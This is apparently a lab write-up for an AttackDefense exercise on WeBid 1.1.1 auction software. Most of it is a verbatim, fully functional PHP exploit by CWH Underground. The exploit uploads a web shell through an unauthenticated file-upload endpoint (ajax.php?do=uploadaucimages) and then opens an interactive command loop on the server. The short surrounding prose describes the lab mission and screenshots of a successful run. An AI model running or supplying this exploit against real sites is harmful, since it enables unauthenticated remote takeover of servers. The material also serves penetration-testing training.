Post

AttackDefense.com [RCE] - WeBid

Image of AttackDefense 2018

Mission

The attacker might not have any user level access to the web application. However, this does not mean that the application cannot be compromised remotely. Remote Code Execution vulnerabilities could be triggered even by unauthenticated users.

In the exercise below, the attacker is unauthenticated to the web application and needs to find a remote code injection attack to run arbitrary commands on the server.

A version of WeBid is vulnerable to a remote code execution attack.

Objective: Your task is to find and exploit this vulnerability.

Level difficulty: Easy

Category: Real Web Applications > Remote Code Execution

Solution

WeBid provides open source auction software which has been used around the world and has been downloaded over 100,000 times and allows consumers to quickly set up their own auction site and get started straight away.

Unfortunately, in this lab, I was provided with a rather old version of WeBid that has a Remote Code Execution Vulnerability using an unrestricted file upload.

Image of AttackDefense 2018

By going to the following link, I was able to retrieve the exact version of this PHP application:

Image of AttackDefense 2018

Funny enough this version of WeBid (1.1.1) is so broken, that the well known @GetSploitBot telegram bot cannot list all the exploits for all the existing vulnerabilities:

Image of AttackDefense 2018

I decided to use an Unrestricted File Upload Exploit in order to obtain a Remote Code Execution Vulnerability. Here is the example PHP exploit that I used in order to obtain an interactive web shell:

Image of AttackDefense 2018

Here is an exact copy of the known PHP exploit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
<?php
   
/*
   
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /      
  / XXXXXX /
 (________(        
  `------'
    
 Exploit Title   : WeBid 1.1.1 Unrestricted File Upload Exploit
 Date            : 20 February 2015
 Exploit Author  : CWH Underground
 Site            : www.2600.in.th
 Vendor Homepage : http://www.webidsupport.com/
 Software Link   : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download
 Version         : 1.1.1
 Tested on       : Window and Linux
    
    
#####################################################
VULNERABILITY: Arbitrary File Upload Vulnerability
#####################################################
    
/ajax.php
/inc/plupload/examples/upload.php
   
#####################################################
DESCRIPTION
#####################################################
    
This exploit a file upload vulnerability found in WeBid 1.1.1, and possibly prior. Attackers can abuse the
upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.
   
#####################################################
EXPLOIT
#####################################################
    
*/
   
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
   
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die("\n[-] No response from {$host}:80\n");
    
    fputs($sock, $packet);
    return stream_get_contents($sock);
}
   
print "\n+----------------------------------------+";
print "\n| WeBid Unrestricted File Upload Exploit |";
print "\n+----------------------------------------+\n";
    
if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /WeBid/\n";
    die();
}
   
$host = $argv[1];
$path = $argv[2];
    
$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"name\"\r\n\r\n";
$payload .= "shell.php\r\n";
$payload .= "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";
 
$packet  = "POST {$path}ajax.php?do=uploadaucimages HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Cookie: PHPSESSID=cwh"."\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
 
print "\n\nExploiting...";
sleep(2);
print "Waiting for shell...\n";
sleep(2);
 
http_send($host, $packet);
   
$packet  = "GET {$path}uploaded/cwh/shell.php HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
 
   print "\n  ,--^----------,--------,-----,-------^--,   \n";
   print "  | |||||||||   `--------'     |          O   \n";
   print "  `+---------------------------^----------|   \n";
   print "    `\_,-------, _________________________|   \n";
   print "      / XXXXXX /`|     /                      \n";
   print "     / XXXXXX /  `\   /                       \n";
   print "    / XXXXXX /\______(                        \n";
   print "   / XXXXXX /                                 \n";
   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
   print " (________(                                   \n";
   print "  `------'                                    \n";
       
while(1)
{
    print "\nWebid-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
 
################################################################################################################
# Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
?>

#  0day.today [2018-02-10]  #

Example usage of the exploit on my localhost:

Image of AttackDefense 2018

Running the exploit against the given target and obtaining the interactive shell:

Image of AttackDefense 2018

Proof of remote code execution and final access:

Image of AttackDefense 2018

Image of AttackDefense 2018

This post is licensed under CC BY 4.0 by the author.